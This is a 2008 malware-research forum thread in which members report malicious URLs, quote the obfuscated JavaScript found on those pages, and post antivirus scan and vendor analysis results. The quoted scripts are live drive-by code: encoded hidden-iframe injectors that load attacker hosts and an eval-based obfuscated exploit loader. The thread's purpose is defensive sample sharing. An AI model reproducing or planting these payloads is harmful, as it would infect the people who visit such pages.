|
Donation/Premium |
|
 |
|
|
|
|
|
|
|
|
|
| View previous topic :: View next topic |
| Author |
Message |
downie
PIRT Handler
Joined: May 19, 2006
Posts: 3982
|
|
| Back to top |
|
 |
MAPKOBKA
Lieutenant
Premium Member
Joined: Jul 04, 2007
Posts: 163
|
 Posted: Thu Mar 06, 2008 4:24 pm Post subject: |
|
|
Thanks.
Will grab code for listserv 
_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
|
|
| Back to top |
|
|
maliciousbrains
Sergeant
Premium Member
Joined: Feb 23, 2008
Posts: 103
|
| Posted: Thu Mar 06, 2008 5:12 pm Post subject: |
|
|
hxxp://alinejoyce.com < Exploit Code
| Quote: |
<script>
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%69%66%20%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%4D%53%49%45%27%29%20%21%3D%20%2D%31%29%20%26%26%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%57%69%6E%64%6F%77%73%20%4E%54%20%35%27%29%20%21%3D%20%2D%31%29%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%74%72%61%66%66%69%6E%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%32%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%20%7D%3C%2F%73%63%72%69%70%74%3E'));
</script> <script>
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%69%66%20%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%4D%53%49%45%27%29%20%21%3D%20%2D%31%29%20%26%26%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%57%69%6E%64%6F%77%73%20%4E%54%20%35%27%29%20%21%3D%20%2D%31%29%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%74%72%61%66%66%69%6E%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%32%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%20%7D%3C%2F%73%63%72%69%70%74%3E'));
</script> <script>
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%69%66%20%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%4D%53%49%45%27%29%20%21%3D%20%2D%31%29%20%26%26%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%57%69%6E%64%6F%77%73%20%4E%54%20%35%27%29%20%21%3D%20%2D%31%29%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%6C%6E%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%74%72%61%66%66%69%6E%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%32%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%20%7D%3C%2F%73%63%72%69%70%74%3E'));
</script> <script>function v47c676a40795d(v47c676a408129){ var v47c676a4088fb=16; return(parseInt(v47c676a408129,v47c676a4088fb));}function v47c676a4098a6(v47c676a40a091){ function v47c676a40b862 () {var v47c676a40c055=2; return v47c676a40c055;} var v47c676a40a87c='';for(v47c676a40b06d=0; v47c676a40b06d<v47c676a40a091.length; v47c676a40b06d+=v47c676a40b862()){ v47c676a40a87c+=(String.fromCharCode(v47c676a40795d(v47c676a40a091.substr(v47c676a40b06d, v47c676a40b862()))));}return v47c676a40a87c;} document.write(v47c676a4098a6('3C696672616D65206E616D653D27333732343166643965666227207372633D27687474703A2F2F6262666F72616D612E636F6D2F7464732F696E2E636769272077696474683D333631206865696768743D343432207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
|
File Scripts.txt
Result: 10/32 (31.25%)
Antivirus Version Last Update Result
AhnLab-V3 2008.3.4.0 2008.03.06 -
AntiVir 7.6.0.73 2008.03.06 HEUR/Exploit.HTML
Authentium 4.93.8 2008.03.06 -
Avast 4.7.1098.0 2008.03.06 -
AVG 7.5.0.516 2008.03.06 JS/Psyme
BitDefender 7.2 2008.03.06 -
CAT-QuickHeal 9.50 2008.03.06 -
ClamAV 0.92.1 2008.03.06 JS.Agent-2
DrWeb 4.44.0.09170 2008.03.06 -
eSafe 7.0.15.0 2008.03.06 -
eTrust-Vet 31.3.5591 2008.03.06 -
Ewido 4.0 2008.03.06 -
FileAdvisor 1 2008.03.06 -
Fortinet 3.14.0.0 2008.03.06 -
F-Prot 4.4.2.54 2008.03.05 -
F-Secure 6.70.13260.0 2008.03.06 Trojan-Clicker.JS.Agent.h
Ikarus T3.1.1.20 2008.03.06 -
Kaspersky 7.0.0.125 2008.03.06 Trojan-Clicker.JS.Agent.h
McAfee 5245 2008.03.05 Exploit-IFrame
Microsoft 1.3301 2008.03.06 TrojanDownloader:JS/Psyme.gen
NOD32v2 2927 2008.03.06 -
Norman 5.80.02 2008.03.06 JS/Exploit_based.D
Panda 9.0.0.4 2008.03.06 -
Prevx1 V2 2008.03.06 -
Rising 20.34.32.00 2008.03.06 -
Sophos 4.27.0 2008.03.06 Mal/ObfJS-AB
Sunbelt 3.0.930.0 2008.03.05 -
Symantec 10 2008.03.06 -
TheHacker 6.2.92.233 2008.03.04 -
VBA32 3.12.6.2 2008.03.05 -
VirusBuster 4.3.26:9 2008.03.06 -
Webwasher-Gateway 6.6.2 2008.03.06 Heuristic.Exploit.HTML
Additional information
File size: 3287 bytes
MD5: 8ee7a9cffcb0112d862c2df3414b33f4
SHA1: 56c02b6e54b0d8e3a9f80ed248f6ffc0fb641f52
PEiD: -
ListServ Link:
 /p1062933-MD5_8ee7a9cffcb0112d862c2df3414b33f4.html#1062933
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
|
|
| Back to top |
|
|
maliciousbrains
Sergeant
Premium Member
Joined: Feb 23, 2008
Posts: 103
|
| Posted: Thu Mar 06, 2008 5:26 pm Post subject: |
|
|
hxxp://chportal.cn/top/count.php?o=2
| Quote: |
<script>var dydfom=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,27,20,33,32,47,0,38,39,61,56,0,0,0,0,0,0,31,30,5,46,44,14,42,28,41,43,48,8,53,9,11,1,18,4,12,13,29,21,62,59,34,23,16,0,0,0,0,0,0,58,7,6,17,37,50,49,3,2,60,40,55,52,19,36,22,35,25,26,57,15,54,10,51,24,45);var exzs="7iWkgnak8fC8tpsH2CC!VN0C2aWkei04!NW4VYF42a4zmpwzHPW!m6wzCWNWq@@HDhV92YAaquVt2hV89fV92YVtq@C9k7CtlnNWvIVv7iWkgNsCmv04faNWvnuHoYEenPuH6nAanPuHHuH9Ps4VvnuHXnCtenuH2NCtHnuHo@VeonuH6@Aans4VvnuH2NV92nuHXNVeonuHeqCoknuHZprt304VvnuHUEH9XnuH2@H97nuH3YVo1PuHX7V9H04VvnuH6YVeqnuHPiA9HnuH2YHonPuHUir9X04VvnuH1Ert2nuHXuMeYPuH6nAeYPuHonMe604VvnuHonranPuH2NV9enuH7@AeUPuH2Nrans4VvnuHHurtnPuH3NMt1PuHUpr9XnuH2YAans4VvnuH2NAanPuHPwCoonuH6uCtonuH7YttPs4VvnuH7nttYPuH7YV91PuH7NttPPuHqn09204VvnuHoNt9mPuHqnItmPuH67VtonuH2bVto04VvnuHPcC9XnuH2NVtenuHXbAt2nuH2NHtH04VvnuHebAanPuHHur9PPuH3NHt2nuHHuMoUs4VvnuH27At2nuH2qEenPuHebAanPuHHYH9e04VvnuH6Nrt2nuHebAanPuHknC9PPuHHntoYs4VvnuH2nrt1PuH16EePPuHYAraenuHYAteYPuH1wraXnuHHNA9e04VvnuHqYV9PPuHYAH9PPuHknAe2nuHnAMt204VvnuH3hH97nuH6bV9YPuH7@MeHnuHYAteYs4VvnuHHuteYPuHqYEtenuHHYtePPuHniMtq04VvnuHUEH9XnuHoNEtXnuH1EMtqnuHoNV9e04VvnuHUcVeYPuHnAMtUPuHYPMaHnuH2nraZs4VvnuHoNEeHnuHYAteYPuHHNVeYPuH2YEePs4VvnuHqNraXnuH7uV9enuHUcVeYPuH6ntoYs4VvnuH1EAeHnuH16CtXnuHYArt2nuHYAteYs4VvnuHYAMtqnuH16Ae2nuHYAre6nuHYAteYPuH6YVtHnuH6bCtenuHq@H9ZPuH7NV9YPuH6bVtHnuH6uVtYPuH7hCtenuHqnttPPuH7nttXnuH6YV9YPuH6bVtYPuH70V9YPuH6YVtonuH67VtonuHqnttonuH67VtonuHX@ttonuHXYttYPuHq@C9qnuHXYHtenuHXuC93nuHXYC92nuHXuC9HnuHX@C9qnuHXhC92nuH7qV97nuHXuC9UPuHXYC92nuHXuC97nuHXNC97nuHX7C9knuHq@C96nuHXYtto04a0@wDqc!4VcwWvqA9vl4kowIDmwFkDbCa0qWzth4kowIDmwFk9Iav7iWkgxNFXpak9VIzDna4mwFDJcwztuu8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehE8opE9ehVj9IVv66NC8P0VjXFkeEwC!sW!8PW4vpsCzbAF2qA92bA92qu4kwsHqXW4vFuWjXFkeEwC!sIa0xNFXpak9VIzaxEH!PIkfi0km64ktP048wI4a0u8oEA9XnC89IVv7iWkguwz2vNWxx!jF48zVEsV9fE9Fq0WqbC9HIECaIuVguwz2vIVDuu!xIVvLaIDofNz!pa!6EwCeP0VvlEzjENzLc4kqwNWx04VqP0k8F48ZiMoZEtonEHoPwHoUpreUPMe1PteYAtepsHep6r6r6M6yXM60Ct60FH6sFr7Tvr7ZiMo1!t7@VH7AaH7ZiMo1hK35i93hE93iwk3ipy2BpK2QPK2bA92bsk2csyXM6yXKXKXKC9XNCy92bA93hE93uV9quC9XNC9eYAtenEtonVt7@Vt60Ct67AaH7EakqEa!0w47E4!40uVF4SI0qWztNwHfwNzXwwVFpI4fPw4mV0H!0ak9pwzt0489IEI0n04XPIFLaIDofNz!pa!6EwCeP0Vv0uVFxav";var cuhj=1960,nsbac,mgepl,gyizlt='',qhgttn=cqbfhl=ivnkd=0;for(mgepl=2;mgepl>0;mgepl--){for(nsbac=Math.min(cuhj,1024);nsbac>0;nsbac--,cuhj--){eval('ivnkd|=(dydfom[exzs.charC'+'odeAt(qhgttn++)-33])<<cqbfhl;');if(cqbfhl){gyizlt+=eval('String.fromCha'+'rCode(209^ivnkd&255)');ivnkd>>=8;cqbfhl-=2}else cqbfhl=6;}}eval(gyizlt);</script>
|
Doesnt seem to be a malware: Result: 0/32 (0%)
However, uploaded file to MMPC for analysis.
Submission has been assigned ID 16000914.
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
|
|
| Back to top |
|
|
bobby_
MIRT Hunter
Joined: Nov 04, 2006
Posts: 237
Location: Austria
|
| Posted: Thu Mar 06, 2008 5:53 pm Post subject: |
|
|
@maliciousbrains
It is WMV exploit for sure.
_________________
ASAP member
|
|
| Back to top |
|
|
MAPKOBKA
Lieutenant
Premium Member
Joined: Jul 04, 2007
Posts: 163
|
| Posted: Thu Mar 06, 2008 7:15 pm Post subject: |
|
|
It probably would be best if you showed the seperate MD5's because now I don't know which ones (samples) you have uploaded to listserv and which you haven't.
Also I dont think it is good if we both uploading the same code from listserv...
_________________
Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
|
|
| Back to top |
|
|
maliciousbrains
Sergeant
Premium Member
Joined: Feb 23, 2008
Posts: 103
|
| Posted: Fri Mar 07, 2008 5:57 am Post subject: |
|
|
| Quote: |
It probably would be best if you showed the separate MD5's because now I don't know which ones (samples) you have uploaded to listserv and which you haven't.
Also I don't think it is good if we both uploading the same code from listserv...
|
MAPKOBKA >If I upload any file in the listserv then I always include the link in the post. About my 2nd comment in this post, I haven't uploaded that script in listserv, however I did upload that script to MMPC for further analysis.
Below is the responce from MMPC:
Analysis summary:
=================
Total Files: 1
Clean: 0
Malware: 1
Malware Related: 0
Malware Container: 0
Potentially Unwanted Software: 0
Potentially Unwanted Software Container: 0
Postponed: 0
Not Yet Analyzed: 0
=================
Per-file summary:
=================
20080306_092325594_0_Scripts2.txt | Malware: Exploit:JS/MS06006.E
http://go.microsoft.com/fwlink/?linkid=95666&name=Exploit%3aJS%2fMS06006.E
If u want u can upload the 2nd script to listserv as it was also detected as a genuine malware.
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
|
|
| Back to top |
|
|
maliciousbrains
Sergeant
Premium Member
Joined: Feb 23, 2008
Posts: 103
|
| Posted: Fri Mar 07, 2008 3:17 pm Post subject: |
|
|
hxxp://chportal.cn/top/count.php?o=2
Exploit Code in link.
VirusTotal Result: 1/32
Antivirus Version Last Update Result
AhnLab-V3 2008.3.4.0 2008.03.07 -
AntiVir 7.6.0.73 2008.03.07 -
Authentium 4.93.8 2008.03.07 -
Avast 4.7.1098.0 2008.03.07 -
AVG 7.5.0.516 2008.03.07 -
BitDefender 7.2 2008.03.07 -
CAT-QuickHeal 9.50 2008.03.06 -
ClamAV 0.92.1 2008.03.07 -
DrWeb 4.44.0.09170 2008.03.07 -
eSafe 7.0.15.0 2008.03.06 -
eTrust-Vet 31.3.5595 2008.03.07 -
Ewido 4.0 2008.03.07 -
FileAdvisor 1 2008.03.07 -
Fortinet 3.14.0.0 2008.03.07 -
F-Prot 4.4.2.54 2008.03.07 -
F-Secure 6.70.13260.0 2008.03.07 -
Ikarus T3.1.1.20 2008.03.07 -
Kaspersky 7.0.0.125 2008.03.07 -
McAfee 5246 2008.03.06 -
Microsoft 1.3301 2008.03.06 - Exploit:JS/MS06006.E
NOD32v2 2930 2008.03.07 -
Norman 5.80.02 2008.03.06 -
Panda 9.0.0.4 2008.03.06 -
Prevx1 V2 2008.03.07 -
Rising 20.34.42.00 2008.03.07 -
Sophos 4.27.0 2008.03.07 -
Sunbelt 3.0.930.0 2008.03.05 -
Symantec 10 2008.03.07 -
TheHacker 6.2.92.235 2008.03.07 -
VBA32 3.12.6.2 2008.03.05 -
VirusBuster 4.3.26:9 2008.03.07 -
Webwasher-Gateway 6.6.2 2008.03.07 -
Additional information
File size: 2608 bytes
MD5: efd7976f854deb71f4fdd0394d8750c6
SHA1: e229583f4cf5ef30e87e614a6600e2bdbd6ac41a
PEiD: -
However, uploaded file to MMPC for analysis.
Submission has been assigned ID 16000914.
Below is the responce from MMPC:
Analysis summary:
=================
Total Files: 1
Clean: 0
Malware: 1
Malware Related: 0
Malware Container: 0
Potentially Unwanted Software: 0
Potentially Unwanted Software Container: 0
Postponed: 0
Not Yet Analyzed: 0
=================
Per-file summary:
=================
20080306_092325594_0_Scripts2.txt | Malware: Exploit:JS/MS06006.E
http://go.microsoft.com/fwlink/?linkid=95666&name=Exploit%3aJS%2fMS06006.E
Added to ListServ:
/p1063223-MD5_efd7976f854deb71f4fdd0394d8750c6.html#1063223
_________________
.:: Malicious Brains ::.
http://www.malwareinfo.org
http://blog.malwareinfo.org
http://forum.malwareinfo.org
There are no patches or service packs for ignorance!
|
|
| Back to top |
|
|
|
|
|
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You cannot download files in this forum
|
Powered by phpBB © 2001 phpBB Group
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
